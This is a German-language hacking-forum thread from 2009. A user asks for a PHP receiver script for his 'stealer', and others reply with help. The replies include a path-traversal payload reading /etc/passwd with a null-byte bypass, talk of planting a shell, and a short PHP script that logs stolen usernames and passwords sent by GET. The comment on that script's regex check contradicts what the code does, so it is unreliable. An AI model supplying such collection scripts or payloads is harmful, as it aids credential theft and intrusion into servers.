PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Send php [hilfe]



inmate
06.06.2009, 15:07
Heyy Jungs.
Ich suche jemanden der mir eine send.php für meinen stealer machen kann , da ich leider kp von php habe.
Er solle eine text datei an den FTP senden.
Danke schonmal

mfG

wacked
06.06.2009, 15:19
is das nich lfi injectable?
www.seite.com/steal.php?file=../../../etc/passwd%00 müsste doch funktionieren?
Alos dass man sich da im prinzip seine shell reinschreibt?

.cr4X
06.06.2009, 15:20
wie schaut es mit post aus? Da get ja weniger auf dem FTP speichert oder?

VeN0m
06.06.2009, 15:29
@wacked: So würde ich es jetzt nicht machen... Das Script öffnet die Datei ja zum schreiben und nicht zum lesen / ausführen. Aber ein Aufruf über Telnet oder ähnlich müsste gehen, wo dann per datei.php%00 das .txt umgangen wird. Somit könnte ein Code eingeschleust werden, der es ermöglicht eine Shell auf den Space zu bekommen...

Wie wäre es so?



<?php

$Datei = (preg_match("/php/",$_GET['file']) ? $_GET['file'] : "sorry_does_not_work");
$Text = $_GET['file'];

$FilePointer = fopen($Datei.".txt", "w");
fwrite($FilePointer, $Text);
fclose($FilePointer);

?>


Per Preg-Match und einem regulären Ausdruck prüfen, ob "php" im Filenamen vorkommt. Wenn ja dann ist die Datei "sorry_does_not_work.txt", wenn nicht dann ist es der GET-Wert.

@.cr4x: GET kann genauso viel übertragen. Nur wird die URL ziemlich lang, was doof ist. POST wäre natürlich auch eine Lösung. Nur kannst Du da genauso Fremdcode einschleusen, wie per GET. Und das mit der Länge... Bei Usernamen / Passwörtern macht das eigentlich nicht sooo viel Unterschied.

Sirect
06.06.2009, 15:33
Es macht allgemein mehr Sinn eine vordefinierte Textdatei zu benutzen, da ich nicht davon ausgehe dass du täglich tausende Logs bekommen wirst =)